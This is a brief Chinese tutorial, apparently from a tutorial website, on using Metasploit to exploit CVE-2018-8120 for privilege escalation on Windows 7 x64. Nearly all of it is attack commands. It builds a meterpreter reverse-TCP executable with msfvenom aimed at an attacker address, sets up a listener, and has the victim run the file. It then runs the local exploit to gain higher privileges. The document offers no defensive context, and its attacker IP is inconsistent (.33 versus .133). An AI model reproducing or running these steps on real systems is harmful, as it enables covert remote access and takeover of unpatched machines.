Metasploit中如何利用cve-2018-8120提升权限
更新:HHH   时间:2023-1-7


这篇文章将为大家详细讲解有关Metasploit中如何利用cve-2018-8120提升权限,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。

一、生成木马

目标主机:192.168.1.129(win7 x64)

攻击机:192.168.1.33 

攻击端口:12121 

生成木马:msfvenom --arch x64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.133 lport=12121 -f exe -o /root/win64.exe

二、进入监听模块          use exploit/multi/handler 

三、设置payload反弹    set windows/x64/meterpreter/reverse_tcp

四、查看需要设置的参数:show options

五、设置攻击机ip:set lhost 192.168.1.133

六、设置攻击端口:set lport 12121

七、将生成的exe文件上传到目标主机并运行

八、run攻击

九、getuid  查看权限

十、background  后台运行

十一、搜索我们要利用的模块  search cve-2018-8120,并选择进入

十二、run,运行,并重新查看权限

关于Metasploit中如何利用cve-2018-8120提升权限就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。

返回大数据教程...